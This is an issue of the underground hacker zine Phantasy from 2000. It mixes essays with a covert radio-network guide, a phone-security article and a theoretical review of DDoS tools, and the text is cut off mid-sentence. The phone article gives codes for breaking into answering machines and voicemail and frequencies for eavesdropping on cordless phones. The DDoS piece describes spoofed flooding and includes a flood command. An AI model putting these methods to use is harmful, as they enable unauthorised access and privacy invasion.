ZINES — underground e-zine archive source
text size: CRT glow:
~/ENGLISH/Phantasy/phant24
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      =                                                               =
      -            WELCOME TO THE TWENTY-FOURTH ISSUE OF              -
      =                                                               =
      -                        -=>PHANTASY<=-                         -
      =                                                               =
      -               A PUBLICATION AND NEWSLETTER OF                 -
      =                                                               =
      -                             THE                               -
      =                        INTERNATIONAL                          =
      -                         INFORMATION                           -
      =                          RETRIEVAL                            =
      -                            GUILD                              -
      =                                                               =
      -  Hacking, Phreaking, Anarchy, Survivalism, and Commentary     -
      =                                                               =
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

      Volume Number Eight - Issue Number Twenty-Four - Dated 03/17/2000
              Editor-In-Chief is Mercenary : iirg@iirg.org
            Staff Writers Are: Thomas Icom : ticom@iirg.org
                                  Black IC : black_ic@iirg.org

 ---------------------
 Table of Discontents:
 ---------------------

 #   Selection                                   Author             
 -  ------------------------------------        ----------------
 1. Legal Ease & IIRG Information               The IIRG
 2. The Myth of the "White Hat Hacker"          Mercenary/IIRG
 3. How To Set Up an Underground 
    Wireless Data Network - Part I              Thomas Icom/IIRG
 4. Basic Phone Security                        Mob Boss
    Making and Breaking It
 5. "Tribe Flood Network 3000"                  Mixter
    A theoretical review
 6. The Nazi Files (Stories of the SS)          The IIRG
 7. IIRG Signal Intelligence                    Black IC/IIRG
    (SIGINT) Guidelines
 8. The Rumor Mill                              Anonymous Sources
 9. FREE the FISH                               Mercenary/IIRG
10. Letters to the IIRG                         N/A
11. IIRG and Phantasy Distribution              The IIRG
12. Articles We Never Want to See               Author Unknown

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [1]: Legal Ease & IIRG Information


    OFFICIAL DISCLAIMER...

    All Contents of PHANTASY Magazine are (C) Copyright by THE IIRG, all 
   rights reserved. Nothing may be reproduced in whole or in part without 
   written permission of the IIRG.
   Phantasy Magazine may also NOT be included on any CD-ROM collection 
   without express written permission of the IIRG. 
    All information published in PHANTASY is from USER contributed material.
   The Publishers and Editors of PHANTASY and THE IIRG disclaim any liability 
   from any damages of any type that the reader or user of such information 
   contained within this newsletter may encounter from the use of said 
   information. All files are brought to you for entertainment purposes only! 
    We also assume all information infringes no copyrights and hereby 
   disclaim any liability.
    In the future PHANTASY Magazine will be made available quarterly to the 
   Internet community free of charge. Any corporate, government, legal, 
   or otherwise commercial usage or possession (electronic or otherwise) is 
   strictly prohibited without written IIRG approval, and is in violation of 
   applicable US Copyright laws.

   The IIRG                                      (IIRG Mailing Address)
   862 Farmington Avenue
   Suite 306
   Bristol, Connecticut 06010

  Here is the IIRG's Public Key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a

mQCNAjE9nrYAAAEEAKuDXqGRyCw42PStHZMLjOVZ2QhTPklKXv5NK3u0hu/EcBYM
Cib6/jIDwgr3uwRo9DVptYVtGAYIY7/3OXw+B+Vxmb846weUBwcY14mBPrRtAjhI
EnSzHeS477sL1MklTQ+cxmDh8TyaAG8s5n+gKHc2qCQ+FTo6L1WIQPIFCJE5AAUR
tBRJSVJHIDxpaXJnQGlpcmcuY29tPg==
=onlg
-----END PGP PUBLIC KEY BLOCK-----

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
 Section [2]: The Myth of the "White Hat Hacker"
              By: Mercenary <iirg@iirg.org>

 The White Hat Hacker does not exist. I propose that this classification
is a myth. This can be proven with a definition, a brief analysis of why 
the term was created, and why this ridiculousness is still flung around 
in the media and hacker communities. 

 First, lets look to see what the term "Hacker" means. 

 The term "hacker" has been misused by the media since the mid 1980's. 
True Hackers are totally different people than what we have been represented 
as. One of our main ethics is to allow no harm to come as a result of our 
actions. For our purposes here, I will refer to "True Hackers" as 
"Classic Hackers".

 Classic Hackers are explorers, individuals whose sole interest is 
learning as much as possible about the electronic systems that fascinate us. 
Some hackers might take excursions into other computer systems, but 
Classic Hackers take the utmost care to disturb nothing. 
 A Classic Hackers goal is not destruction, nor profit, nor revenge.
Our goal is the pursuit of knowledge and the pursuit of conquest. 
A Classic Hacker believes that information should be free, and that pushing 
the envelope of what is possible should be a daily occurrence. 
We believe that every system is ripe for improvement, whether the 
system is a computer, a program, a set of traffic lights, or a government. 

 The term "White Hat Hacker" is a self-proclaimed title of the Hacker
turned businessman. It is a term created in an attempt to justify 
selling out to the business community"

The most classic example of this is the "L0pht".

 If we look at their FAQ from 1998 we will see that they defined 
themselves as "just a bunch of hackers who got together and started 
working on projects together". They also claimed that "We're not in 
this for the money, or the glory".
 But as is the case with many former hackers, MONEY is the deciding
factor when push comes to shove. As we can see in their latest FAQ
they totally disregard their roots and now claim "We strived to be 
(and achieved) a pure R&D environment. Unfortunately pure research 
and development is not a very profitable arena."
 Of course hacking is not profitable. Nobody ever said it was.
Unless you cross the line and become an actual "criminal", you
can expect to make nothing off your activities.
 I have no problem with Hackers switching to security consulting.
But if you become a security consultant, you are no longer a Hacker.
 By attempting to label yourself as a "White Hat Hacker" you are 
just trying to gain your acceptance to possible customers (victims). 
 Security consultants are businessmen first and foremost, and they 
know their prey well.
 
Can you see the pattern? 

A security consulting firm's job is not to protect your company, 
a security consulting firm's job is to make money selling protection to 
you from demons, real or imagined. 
 In plain words, when they are working for you they are working for 
themselves and this is the case in the entire free market world. 
 The security consultant title is designed to facilitate the deception 
that if you have enough money, someone will take care of your problem 
rather than you learning how to solve our own security issues.

 Now I am sure you have heard by now that the government is waging a 
major propaganda war against the on-line hacker community with the help 
of the socialist media.
 The government and the media are experts on psychology, psychological 
warfare, and brainwashing. Between the two groups they know more about 
the human mind and behavior, and how to control both.
 The anti-hacker movement's main propaganda themes seem to be that 

(1) Hackers are the root of all on-line evil.

(2) That the government, (through more restrictive legislation) 
    is the business community's only hope against the spreading 
    plague of computer crime. 

 To understand the anti-hacker movement, we must understand what 
propaganda is. 
 Simply put, propaganda can be outright lies, distorted facts, and/or 
truth, combined to change a person's thoughts on a subject.
 
 Now it has been known for sometime by the Central Intelligence Agency 
that countries such as Russia and China are developing tools to attack 
commercial computer networks.
 Even FBI Director Louis Freeh says that we face a "very serious" espionage 
threat from China. Organized Chinese fraud rings on the mainland and overseas
are hacking databases to compromise credit and identity details.
 "The Chinese gangs have moved into the electronic age where they're using 
hacking techniques and Internet theft," US Secret Service Special Agent 
Gregory Regan explained in testimony before the Senate Judiciary 
Subcommittee on Technology, Terrorism and Government Information.

 Yet with these undeniable allegations by the governments own lackeys,
Janet Reno wants to go after the so called "evil 15 year old hackers",
when it looks like they should have their sights targeted elsewhere.

 What makes this all so much worse is that the "White Hat Hackers" who 
once claimed that "We're not in this for the money, or the glory" are 
testifying before the Senate and strolling up to every TV camera they
can find supposedly speaking for a community they have actually have no 
part in anymore.

 The main problem with the media is that they glorify what I like to call
"hacking misfits". The only hackers, crackers, or script kiddies who get
glorified by the media are those who messed-up and got caught.
 The media loves the term "White Hat Hacker", it lets them put across
the propaganda of community cannibalism. 

Hackers turn against their own kind. 

 Lets get the story right folks, these are not hackers, they are paid
Security consultants out to make money selling protection to you for 
something you could easily correct yourself". 
 If you have problems with a "hacker", it's not a Classic Hacker.

        You have a computer criminal on your hands. 

 Hackers do not brag in public IRC channels. Hackers do not testify in
front of Senate committees. If you've been hacked by a "Classic Hacker"
and he's done it right - you'll never even know it.

 So lets get the terminology straight.

 1. Security Consultant - what former hackers become when they sell
                          out their ideals and community.

 2. Computer Criminal   - anyone who uses a computer for monetary gain
                          or illegal activity resulting in damage.

 3. White Hat Hacker    - no such animal or mammal.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [3]: How To Set Up an Underground Wireless Data Network - Part I
              By: Tom Icom <ticom@iirg.org>

Introduction
============

    Sending data over the airwaves actually predates the Internet. Back in
the 60s, Hams were using a 5-bit code known as Baudot to communicate over
HF amateur bands. The devices used were large electromechanical affairs
known as Teletypes, and ran at speeds of 45 and 75 baud. Baudot is still
used on HF, along with ASCII running at 110 and 300 baud, and other more
modern digital modes such as AMTOR and PSK. Back in the late 80s, Packet
Radio made its appearance running AX.25 (a ham radio version of X.25 used
by packet switched networks) at 300 and 1200 baud. Hams set up a massive
AX.25 digital network stretching on the east coast from Maine to Florida
and inland to the Mississippi River.

    The rise of the Internet, however, caused the decline of packet
radio's popularity. Packet radio requires an amateur radio license, where
the Internet does not. Packet Radio's top speed for the average end user
is generally limited to 9600 baud, with 1200 baud being most common. The
average Internet user comes in at 56K baud over the phone lines, and
faster if they use a cable modem. Packet radio requires more technical
expertise to get up than Internet service.  This is all beyond the means
and intelligence of the average DOS/Exploit/Script "hacker", whose main
concern appears to be acting his sexual frustrations out on random
computer systems.

     Certain "white hat hacker" groups (AKA - Security Consultants)
have been attempting to implement a wireless "underground" network. 
This has been unsuccessful to date because of their insistence of wanting 
a wireless high speed TCP/IP backbone with a ton of superfluous bells and 
whistles as the foundation of their network, legal issues with accessing 
the Internet via the Amateur Bands, short range and high cost of Part 15 
wireless networking devices, and a general lack of serious interest among 
many of the "hackers" they recruit. With many "white hats" now doing 
infosec for corporate interests in a blatant manner, one must begin to 
wonder just how "underground" such a network would be if implemented.

    Other hobbyist organizations have implemented wireless Internet on a
small scale in their locales. While this is all fine and dandy, I don't
consider them underground networks due to the fact that they are operating
in a totally overt manner and are connected to the Internet. Let's face
it. The Internet is great for downloading technical and product support
information, emailing friends and family, expanding one's non-computer
hobbies, and getting the latest news and weather. As the basis for an
underground network it quite frankly sucks, and I fully expect the Feds to
step in and muscle more restrictions on it in the future. It is happening
in the same way it started with our Second Amendment rights,
highly-publicized incidents followed by a call to action by the "experts".

    If you're looking to be able to surf the web, and download megabyte
multimedia files in 30 seconds while at the beach for only $19.95 +
shipping and handling FORGET IT. If you want to be a part of an effective
wireless underground network, then I will show you how, and it will work.
The equipment is inexpensive, and is available off the shelf at any
business that sells amateur radio equipment. The cost of the equipment can
be as little as $200 per station PROVIDED you are willing to expend the
effort to do so. Battery-operated stations are cable of being fitted into
a .50 caliber military surplus ammo can with a solar powered trickle
charger, and placed on a remote hilltop to act as relay stations for
months of unattended operation. While this network does not have
indigenous encryption, it will support the encryption system of your
choice. This, like other aspects of the network, allows you to customize
specifics to suit your needs, thus increasing OPSEC (operational
security). I'm of the belief that telling the world what type of
encryption you're using only gives your enemies one more thing with which
to screw you with. While it may be fine and dandy for the white hat
hackers and academic idiots to allow themselves to play with each other's
crypto, we are simply interested in good COMSEC (Communications Security).
There is plenty of information out there as to what works and what
doesn't. If you decide to use a Caesar cipher on your system you have no
one to blame but yourself.

Equipment
=========

    You will only need the following to get up and running. You will need
a radio.  Most people acquire a 2m/70cm dual-band ham HT that has been
modified for out of band use. These radios typically have a maximum power
output of five watts over a frequency range of 140-174 and 420-470 MHz.
You may also upgrade to a base/mobile unit which offers a power output of
25-50 watts depending on the make and model. You will need a Terminal Node
Controller. This is a 1200 baud AX.25 radio modem that interfaces between
your terminal and your radio. You will need an RS-232 terminal. You can
use anything that has an RS-232 port; PC, Mac, C64, Atari, or even an old
DEC VT-100 terminal if that's what you have. All the work is done via the
TNC. You will need some sort of antenna system. All HTs come with a stock
rubber duck antenna, but you should upgrade to at least a home-built
dipole, 1/4 wave vertical, or j-pole antenna. With a good antenna, even
running 5 watts will give you decent range. You will need a 12 volt power
supply. For a little 5 watt HT you can get by with you basic 3 AMP Radio
Shack supply. A 50 watt mobile will require a larger 20 Amp supply such as
an Astron or similar make.  Hooking all this stuff up is relatively
simple. Specific instructions will be included with the equipment you
purchase, but will be along these lines:


\|/ Antenna     /-----------------------+----------Power Supply
 |              |                       |
 |       +--------------+            /-----\
 |  Coax |              |-Speaker----|     |          Computer Running
 \-Cable-|   Radio      |-Mic Audio--| TNC |-RS-232-- Terminal Program
    Feed |              |-Mic PTT----|     |
         +--------------+            \-----/

    Not too difficult, is it?  THAT is the foundation of the IIRG's
network NEWNet: New England Wireless Network, and that's all you need in
order to get access.  With this simple set-up, you have the capability of
both maintaining a local commo net with your group, and integrating with
larger networks consisting of other groups in your region.

    In future issues of Phantasy, I will detailing more of the nuts,
bolts, hints and kinks involved in setting up a functional underground
wireless digital communications network. Comments and questions can be
emailed to ticom@iirg.org and there is also a room dedicated to this
purpose up on our telnet BBS PFTE (telnet: luna.iirg.org uid:BBS no p/w).

======================================================================
Thomas Icom, IIRG - <ticom@iirg.org>
International Information Retrieval Guild, "May Odin guide your way!"
<http://www.iirg.org/~ticom/> VMB: 877-570-5970 x570 
======================================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [4]: Basic Phone Security - Making and Breaking It
              By: Mob Boss <mafia_man777@ureach.com>

 The other day I was sitting in class and I was bored out of my head so 
I picked up a dictionary. I was curious to see how a hacker was defined,
considering that seems to be one of the most passionately fought arguments,
good against evil, hackers against crackers. 
 I found the definition to be "A computer enthusiast, someone who breaks
into computers". Not suprising but when I went to look for "Phreak" and 
"Phone Phreak", low and behold, it was not there. This seems to be common 
these days. Everyone is shaking in their boots about big, bad, evil hackers
and what might happen to their home or business computer, but no one ever 
stops to think about the phone system. 
 This article is not geared towards anyone specific, in fact this is just 
an abstract to guide all those who are interested in general security, 
privacy, and H/P. Whether your a small business owner, a homemaker, or an 
executive, there is something here that you should know, if you don't 
already. 
 Phone Phreaking can be loosely defined as the exploration and exploitation 
of the phone system and everything that goes along with it. Back in the 60's
and 70's there was blue boxing, back in the eighties and early nineties there
was red boxing, but nothing compares to the things that are here now, in the 
early part of the 21st century. Seems everything is hooked up to the phone 
system one way or another these days. 
 People are sporting voicemail, pagers, cell phones, home answering machines,
fax machines, computers hooked up to the internet, cell phones hooked up to 
the internet, and there are plans to have cars on the internet pretty soon 
as well, (i.e. 2600 issue 16:4, I OWN YOUR CAR). 

 1984 is here, just a little late . 

 Now considering all that why would someone ignore learning about the phone 
system considering the whole backbone of telecommunications is the phone 
system. That's a mistake a lot of companies and individuals make. 
 Besides theft of phone service, as there are so many legal ways to make a 
free call these days, but how about privacy. How would you like someone 
monitoring your business via the voicemail system or maybe monitoring your 
house by using the remote access feature on your answering machine to 
actually listen in on what's going on. How about someone tapping your analog 
cell phone or old cordless phone? 
 Now from the attackers point of view, what better way to watch a target? 
You want to break into a computer network, monitor the voicemail systems for
possible technical information and logins. You want to break into a house, 
listen to messages on the answering machine to find out the patterns of 
those who reside there. Want to blackmail, extort, and steal, well then 
there are tons of possibilities for you. 
 Lets start at home. What communication devices do you own? 
Cordless phone, PC, Fax machine, answering machine? I'm willing to bet you 
have at least one or all of those items in your home. First I will touch on
answering machines, personally I could live without it. Most people hate 
talking on answering machines  , and when its not meant to be its not meant
to be. But I still own one and the first thing I did when I learned about 
breaking into answering machines was to check my manual to see if my machine
had remote access. As it turned out, it did have remote access but lucky for
me it has a strong security policy, two bad tries will boot you off, plus the
code is a good one. Now machines I have encountered in businesses 
and homes were as easy as dialing 123 after the tone. 
 So what you say? You have nothing to hide? Well privacy is privacy and 
either way I don't want some thug hearing when I'll be at the dentist or 
vacation. This is twice as bad if you're a business and you have customers
leave orders on the phone after hours. 
 Credit card fraud has been booming since the 1980's and two decades later 
its still a problem, and its a safe bet that it always will be a problem. 
 Here is an easy to follow system for getting into an answering machine, out
of the many techniques I have read, tried, or heard of this one is the most 
rewarding... 

after the tone start dialing this sequence, 

9876543210000123456789 then 2000, 3000, till you hit 9000, then 
1111, 2222, and so on till you hit 9999. 

 That technique will break into answering machines in the homes of 
government officials, mail order stores, and places that should be more 
secure. Try that on your machine or a friends (with his permission of 
course) and see how secure that answering machine really is. 
 Another problem that has been around for many years is that of people 
tapping cordless phones with simple frequency scanners. Now this problem
has been dying out but when I flip on the Ol' Bearcat I still hear morons 
yacking away on there old, ten dollar, garage sale, cordless phones. 
 These aren't wholesome conversations either. Drug deals, phone sex, and 
fights. I guess it all depends on where you live but just the same there 
are a lot of possibilities here. Like I said, this is not a new problem, 
but its still wide spread even though a whole decade of cordless terror 
has gone by. 

By programming the following frequencies into your scanner 
you'll here many conversations:

           Base     Handset      

   1      43.720   48.760
   2      43.740   48.840
   3      43.820   48.860
   4      43.840   48.920
   5      43.920   49.000
   6      43.960   49.080
   7      44.120   49.100
   8      44.160   49.160
   9      44.180   49.200
  10      44.200   49.240
  11      44.320   49.280
  12      44.360   49.360
  13      44.400   49.400
  14      44.460   49.480
  15      44.480   49.500
  16      46.610   49.670
  17      46.630   49.845
  18      46.670   49.860
  19      46.710   49.770
  20      46.730   49.875
  21      46.770   49.830
  22      46.830   49.890
  23      46.870   49.930
  24      46.930   49.990
  25      46.970   49.970

 Obviously you want to listen into the base frequencies so that you hear
 both sides of the conversation. Now you may say well I don't have an old 
phone, "I have a brand new cordless phone that runs on the 900mhz band 
and scrambles the conversation". 
 The only thing I have to say to that is, what if your business partner, 
mistress, and/or accomplice are using a old cordless phone, then your 
security measures mean nothing and its out there. That's why you have to 
analyze security from afar, missing the big picture will really screw you up. 
 Are you running a dialup server at your residence or small business? 
If you think its safe because no one but you had the dialup then you my 
friend are dead wrong. For years people have been using programs called 
war dialers (i.e. ToneLoc) to scan exchanges looking for computers and just 
because times have changed and the internet seems to dominate all doesn't 
mean that people have stopped looking to their local exchanges either. 
In fact much can still be found by having a war dialer go for a few hours 
and attackers know this. A company can have a big fancy firewall but a 
dialup sticking out like a sore thumb a few numbers up from their main 
switchboard number. That kind of ignorance can be very,  very costly and it 
would be wise to see how your computers are set up. If a dialup server is 
necessary be sure to pick strong passwords and keep up with a good policy 
for protecting that data, physically and remotely. 

	Lets move on to your small (or large) business. 

 Most businesses worth anything at least have a small PBX and voicemail 
system, plus the kind of stuff you may have at home, as all the same of 
rules of home security apply at the office as well. Its very important that
a person takes his sweet time with setting up the phone system, baby it just
as much you would the computer network because leaving the phone system 
open will lead the path to your precious network. 
If someone gets into your phone system what do you have to lose? 
Privacy, valuable information about customers (credit card information), 
use of your lines to call Europe and what not. 
 I must say that PBXs are more challenging now then they were ten years ago 
but considering most voicemail systems run hand in hand with the PBX, 
having weak passcodes on your voicemail system can lead to exploitation of 
your PBX services. Meridian Mail, which is put out by Nortel (www.nortel.com),
for instance has a nice little feature where you can set the operator 
assistance number, which in what I have seen is local numbers, just the same
it can be useful for bouncing through to avoid tracing. I don't think 
anyone wants their phone system used as a jumping off point for attack 
against something big. The same rules of breaking into answering machines 
applies to voicemail, but one can get more creative here. 
 There is usually multiple accounts on a system so if you can't get into one,
move onto another. 999 or 9999 is usually an administrators box and 100 or 
1000 is usually a general delivery box. Its been my experience that the 
general delivery box can be the most influential as that's where your 
general information can be obtained and that's also a very easy box to get 
into, a lot of the time the passcode is just 
1000. In general though some passcodes to try are the number of the box as 
the passcode, 1234, 1111 to 9999, 1000 to 9000, the name of the person or 
company in DTMF, and the last four digits of the phone number. Knowing that,
its possible to use these private phone networks for a lot of different 
things and I think its very clear why someone should take this into 
consideration. 
 Ok now that its clear that your everyday conversations are at risk lets 
talk about some of the ways we can insure that our distant party is the 
only other person to hear the conversation. Remember the only secure 
conversation is one in person, free of any monitoring. Getting back to the 
point, one must consider what level of security is needed for a conversation 
before they begin to put security measures in place. For instance I doubt 
you need to encrypt a voice conversation with your grandmother (unless she 
works for a three letter agency) nor do I think you want to be on that old 
cordless phone while buying arms from third world terrorists (not that I'm 
advocating that). Lets say you are interested in securing voice 
communication, here are some ideas on what you can do to protect your 
privacy. The first method is accomplished through PGPphone, a nice little 
program from the makers of PGP (Pretty Good Privacy). This program allows 
for secure modem to modem or tcp/ip based voice communication. Using PGP keys
at the strength preselected the conversation can be encrypted and secured 
from prying ears. Only drawback is that there is a little bit of lag and the 
stronger the key, the more static and breakup you will get. Another idea for 
shaking any taps on your phone line or your counterparts phone line is 
through the use of a number of payphone. If you keep a good list of payphone 
numbers in your area that allow for incoming calls you can be at a certain 
payphone at a preselected time to receive that call. If its busy you can 
always have a backup payphone not too far away or your contact will simply 
try back every two minutes. In my area at least there are still some 
neighborhood COCOTs (customer owned coin operated telephone) that still take 
in calls. Your best bet is to call a voicemail number that has ANI every 
time your at a payphone. When you get home call all the payphone numbers you 
accumulated and see which ones take in calls. Some owned by the Telco will 
not allow the call to go through, some COCOTs will have a modem pick up. 
As another approach you could always invest in one of those expensive 
communication devices that hook up to the telephone and allow you to call 
another telephone with the device. The price is definitely a drawback 
($500 area) so using one of the less expensive methods is most likely the 
best way to go). Be creative and use your common sense, doing that 
you'll come up with many creative ideas. 

	This was meant simply as a primer to phone security. Yes these are old 
problems but they needed to retouched on because it seems many people are 
still mystified by simple phone phreaking techniques. There are other phone
risks, such as beige boxing and social engineering, but those topics have 
been covered already in some very well detailed articles that are available
on sites all over the internet and fine BBSs like Ripco. I hope this has 
opened your eyes to the dangers out there or at least refreshed your memory.
 And to cut off all those flames that I ripped this information off and what 
not, I have spent many hours on the phone testing and perfecting these 
techniques, there is nothing here that I don't have first hand knowledge of.
 I'd like to leave off with these words that good friend recently told me, 
"When you take from one its plagiarism, but when you take from many its 
research.".

Appendix

PGPphone                        

http://web.mit.edu/network/pgpfone/

Phreaking Info                  http://come.to/mobdomain
                                http://www.phonelosers.org
                                http://www.hackersclub.com/km


-The Mob Boss; http://come.to/mobdomain
 Voicemail and fax: 1-877-203-3043

 Special Thanks To...

Deo
Ryan 
Websulker (http://www.websulker.com)

and anyone else I left out... 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [5]: "Tribe Flood Network 3000": A theoretical review
              By: Mixter <mixter@newyorkoffice.com>

-----BEGIN PGP SIGNED MESSAGE-----


		"Tribe Flood Network 3000": A theoretical review
	of what exactly Distributed DOS tools are, how they can be used,
   what more dangerous features can be implemented in the future, and starting
       points on establishing Network Intrusion Detection Rules for DDOS.	


Many technically uninformed people consider DDOS as a weapon, that should not
be publicly evolved and distributed. This is the only further thing I'll be
releasing to explain DDOS tools, comprehensible for EVERYONE, and future
features that may be implemented in DDOS: a brief theoretical description.
BTW: People with technical knowledge may skip over the most stuff in I. and II.


I. What is distributed DOS, what can it be used for, how does it operate?
II. What are DDOS features, what are future DDOS features, how is DDOS evolving?
III. DDOS, an exploit or not? Should it be published? What is the main problem?
IV. How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?


I.
What is distributed DOS?
Distributed DOS, like any distributed concept, will make it easy to coordinate
a procedure that is launched from many computers. In this case it is Denial
Of Service in form of packet flooding, to overload network links.
DDOS IS NOT A HACKING TOOL CATEGORY. Distributed DOS tools are PENETRATION
tools. They do not exploit security vulnerabilities, but they can demonstrate
what amount of traffic a host can or cannot handle. Distributed DOS has been
used a long time by professional security consultants for penetration testing.
Before there were DDOS attack tools, there have been commercial, non-open-source
programs out that could launch distributed packet floods. Those were used in the
information security consulting business, to perform a security service called
"Capacity Management". The purpose of Capacity Management is to determine how
much traffic a network can handle, to see if the targets bandwidth has to be
improved, or if it can handle enough traffic while providing service reliably.

What can it be used for?
It can overload, or flood if you want, network links. It sends meaningless
packets, the overall amount of data being more that the network can process.
The impact is that the targets can not be reached over a network. That is all.

How does it operate?
The basic concept is that you install a huge amount of DOS servers on different
hosts. They will await commands from a central client. A central client can then
message all the servers, and instruct them to send as many traffic as they can
to one target. The tool distributes the work of flooding a target amongst all
available DOS servers, therefore it is called a distributed concept.
Before these tools were available, an attacker (or penetration tester) would
have to telnet into all the hosts that he wanted to use, log in as a user,
and manually launch a command to flood a target on each of the hosts that
should flood, for example using the UNIX standard tool ping: 'ping -f target'


II.
What are DDOS features?
The actual attack tools don't do simple flooding, but variations of it which
involves using actual weaknesses in a protocol to a) make an attack more
powerful b) make an attack harder to track back. First, current DDOS tools
spoof source addresses. They are sending raw IP packets, and due to the
nature of the internet protocol the source addresses can be fake ones, and
single (not connection oriented) packets will still reach their destination.
This is basically what makes backtracking of the attacks so hard. DDOS is
also exploiting protocol weaknesses, it for example can open up half-open
TCP connections by SYN flooding. This is a very old and well known protocol
vulnerability, and feasible countermeasures are present. To make attacks more
powerful, DDOS can generally use any protocol vulnerability that can be
exploited by sending single, not connection oriented packet traffic to a host.

What are future DDOS features?
Things that can still be implemented, but have not in publicized tools,
are protocol vulnerabilities as mentioned above. One of those is the "stream"
attack (discovered by Tim Yardley, stream.c and spank.c demonstrate the
vulnerability and are public). Stream attack sends TCP packets with either
ACK or both SYN and ACK flags set. Because they are not part of a connection,
they will "confuse" a target machine and take some time to be processed by
the operating system. If this attack is used in a distributed way, the attacker
can overload machines with less hosts. From what I've heard, distributed stream
attack IS already implemented in private DDOS tools. It is very trivial to
implement this feature. Possibility 2 that is not implemented yet are
multicast addresses. Multicast addresses are routed (forwarded) specially by
routers, they can multiply one packet into several ones. The concept would be
to send out packets with a multicast (224.x.x.x) source. A target could send
an error message back to multicast destinations, and multiply the bandwidth.
This concept has also been mentioned by Tim Yardley. Another concept could
be to purposefully send special strings in the flood traffic, strings that
Intrusion Detection Systems (IDS) could falsely interpret as break-in attempts,
the impact would be false alarms and affected IDS could get overloaded or crash.

How is DDOS evolving?
As I mentioned, the first tools that did distributed denial of service were
commercial penetration tools. The origin of using general DOS is certainly
IRC (Internet Relay Chat), where kiddies can take over control of channels if
they temporarily take out computer systems with DOS. The first packet flooding
DOS that involved multiple servers flooding was "smurf". Smurfing relied on
mis-configured networks replying back to a broadcast address, sending one
packet would result in hundreds bouncing back. Then, most of those networks
were fixed, and attackers compromised a lot of hosts, preferably hosts with
high bandwidth, and started flooding manually from them. Because this took
a lot of time, attackers wrote servers which they installed on the hosts
they had compromised. They no longer needed to log in, but only message those
servers. The DDOS attack tools I know of are, in chronological release order:
fapi (private, by ?), blitznet (public, by phreeon), trinoo (private, by 
phifli), TFN (public, by me), stacheldraht (private, by randomizer), shaft
(private, by ?), TFN2K (public, by me), Trank (TRinoo + spANK.c?, private).
The recent development has also continued in other ways, since people were
monitoring traffic for very DDOS-program-specific traffic (like known character
strings, known passwords, default ports), there have been many small variations
made to the code of the above tools, by attackers, to prevent being detected.


III.
DDOS, an exploit or not?
No. DDOS itself is not an exploit. It just makes an existing concept more
easy. Take the distributed.net RC5 challenge and distributed password crackers.
They are not exploits. But they are exposing a weakness, that many passwords
can be brute forced faster than people think. DDOS shows that many networks
are not as strong as they seem to be and can be overloaded faster than people
used to think. Additionally, there are actual exploits implemented in DDOS
exploits, that exploit security holes in network protocols currently used
on the Internet. These security holes must not necessarily be exploited to
make DDOS possible, but they do make the impact of DDOS attacks more powerful.
Such exploits are the possibility of arbitrarily spoofing IP addresses, SYN
flooding, IP stack attacks with bad fragmentation, header offsets and other
"magic packets", the stream vulnerability, and missing authentication and
security of traffic known as connection-less or stateless.

Should it be published?
That is for you to decide. It is your personal opinion. But people will
continue to publish vulnerabilities. Hundreds of talented security analysts
are professionally researching vulnerabilities in software, and posting
exploit programs, which can often be used to instantly compromise a system
running the vulnerable software at root level. The past has shown, that since
security vulnerabilities were a problem on the internet, people have been
ignoring advisories containing only the information THAT something was
vulnerable to an attack, disregarding them as being "completely theoretic".
Only when people wrote up and posted ready-to-(ab)use vulnerability
exploits, the severity of vulnerabilities became clear, and people would
make an effort to counter those vulnerabilities.

What is the main problem?
The main problem, that made attacks against sites as big as yahoo.com
possible, is the bad overall security on the internet. With ONLY a DDOS
tool in his hands, Joe Attacker cannot do anything. But security vulnerabilities
are omni-present on the majority of hosts on the net. An awful lot of these
hosts are not caring about their security, as a result they are running
software that is KNOWN to be vulnerable, and against which public exploit
programs exist. An attacker has only to run one of the public exploit programs
and he is granted full access to such hosts. And various people have been
able to compromise THOUSANDS of hosts with well-known, old vulnerabilities.
Even high speed university networks, which originally built the foundation
of internet architecture have proven to be insecure. With full control over
thousands of hosts, it is easy to concentrate all of these hosts resources,
and to be able to attack almost anything on the internet.


IV.
How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?

The mistake everyone has been making is to search for default strings of
special DDOS tools, for default values, ports, passwords, etc.
To establish Network Intrusion Detection capability in order to spot these
tools, that operate via connectionless raw packets, people will have to start
looking for general signs of DDOS traffic, signs that are obvious and
traffic that is extensively anomalous and suspicious.
There are two kinds of DDOS-generated traffic, control traffic (between DDOS
client and servers) and flood traffic (between DDOS servers and DDOS victim).
Credits to rain forest puppy, Dave Dittrich, and Axent Security Team
for providing some initial hints I needed to write this up.

Anomaly 0: This is not real "DDOS" traffic, but it can be a viable method
of determining the origin of DDOS attacks. As observed by RFP, an attacker
will have to resolve his victim's hostname before a DDOS attack. BIND name
servers are capable of recording these requests. You can either send them
a WINCH signal with 'kill', or you can specify query logging in the BIND
configuration. A single PTR type query before an attack indicates the request
was made from the attackers host, a great load of PTR type query for a
DDOS victim before an attack indicates that the flood servers have been
fed a host name and each server was resolving the hostname for itself.

Anomaly 1: Amount of bandwidth exceeds a maximum threshold that is
expected normal traffic for a site could cause. Alternatively, the
threshold can be measures in the amount of different source addresses
in the traffic. These are clear signs of flood traffic and ACL rules can be
implemented on the backbone routers that detect these signs and filter traffic.

Anomaly 2: Oversized ICMP and UDP packets. Stateful UDP sessions are
normally using small UDP packets, having a payload of not more than 10
bytes. Normal ICMP messages don't exceed 64 to 128 bytes. Packets that
are reasonably bigger are suspicious of containing control traffic, mostly
